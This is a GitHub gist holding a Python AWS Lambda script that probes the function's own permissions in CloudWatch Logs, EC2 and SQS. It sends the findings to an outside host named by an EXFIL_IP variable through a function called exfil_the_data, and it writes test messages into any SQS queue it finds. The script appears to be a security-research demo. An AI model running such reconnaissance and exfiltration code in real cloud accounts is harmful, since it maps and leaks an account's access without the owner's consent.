Skip to content

Instantly share code, notes, and snippets.

@andrewkrug
Created July 15, 2017 22:08
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save andrewkrug/c2a8858e1f63d9bcf38706048db2926a to your computer and use it in GitHub Desktop.
Save andrewkrug/c2a8858e1f63d9bcf38706048db2926a to your computer and use it in GitHub Desktop.
import botocore
import boto3
import json
import os
import time
import uuid
try:
import urllib2
except:
import urllib.request as urllib2
"""
Checks to run if the environment is AWS.
logs:CreateLogGroup
logs:CreateLogStream
logs:PutLogEvents
ec2:DescribeTags
sqs:ListQueues
sqs:PutMessage
"""
def _cloudwatch_create_log_group(client):
try:
response = client.create_log_group(
logGroupName="serverless-observatory-check-{uuid}".format(uuid=uuid.uuid4().hex),
)
return True
except botocore.exceptions.ClientError as e:
return False
def _cloudwatch_create_log_stream(client):
try:
response = client.create_log_stream(
logGroupName=os.getenv('AWS_LAMBDA_LOG_GROUP_NAME', None),
logStreamName='foo'
)
return True
except botocore.exceptions.ClientError as e:
return False
def _cloudwatch_put_log_events(client):
try:
response = client.put_log_events(
logGroupName=os.getenv('AWS_LAMBDA_LOG_GROUP_NAME', None),
logStreamName=os.getenv('AWS_LAMBDA_LOG_STREAM_NAME', None),
logEvents=[
{
'timestamp': int(time.time()),
'message': 'Test event from the serverless observatory profiler.'
},
]
)
except botocore.exceptions.ClientError as e:
return False
except Exception as e:
return False
def check_cloudwatch():
cloudwatch = boto3.client('logs')
results = {
'CreateLogGroup': _cloudwatch_create_log_group(cloudwatch),
'CreateLogStream': _cloudwatch_create_log_group(cloudwatch),
'PutLogEvents': _cloudwatch_put_log_events(cloudwatch)
}
return results
def _ec2_can_describe_tags(client):
try:
response = client.describe_tags(
DryRun=True,
MaxResults=10
)
return True
except botocore.exceptions.ClientError as e:
return False
def check_ec2():
ec2 = boto3.client('ec2', region_name=os.getenv('AWS_DEFAULT_REGION'))
results = {
'DescribeTags': _ec2_can_describe_tags(ec2)
}
return results
def _sqs_can_list_queues(client):
try:
response = client.list_queues()
return True
except botocore.exceptions.ClientError as e:
return False
def _sqs_can_put_message(client):
try:
response = client.list_queues()
if response.get('QueueUrls', None) is not None:
for queue in response['QueueUrls']:
try:
client.send_message(
QueueUrl=queue,
MessageBody={}
)
# Set status to pass first put that succeeds
return True
break
except:
# Allow loop to continue
pass
return False
else:
return False
except botocore.exceptions.ClientError as e:
return False
def check_sqs():
sqs = boto3.client('sqs')
results = {
'ListQueues': _sqs_can_list_queues(sqs),
'PutMessage': _sqs_can_put_message(sqs)
}
return results
def exfil_the_data(data):
exfil_ip = os.getenv('EXFIL_IP')
data = data.encode('utf-8')
headers = {
'Content-Type': 'application/json'
}
req = urllib2.Request(
"http://{EXFIL_IP}/".format(EXFIL_IP=exfil_ip),
data=data,
headers=headers
)
response = urllib2.urlopen(req)
print(response)
def main(event, context):
json.dumps(check_cloudwatch())
exfil_the_data(json.dumps(check_cloudwatch()))
exfil_the_data(json.dumps(check_ec2()))
exfil_the_data(json.dumps(check_sqs()))
if __name__ == "__main__":
json.dumps(check_cloudwatch())
exfil_the_data(json.dumps(check_cloudwatch()))
exfil_the_data(json.dumps(check_ec2()))
exfil_the_data(json.dumps(check_sqs()))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment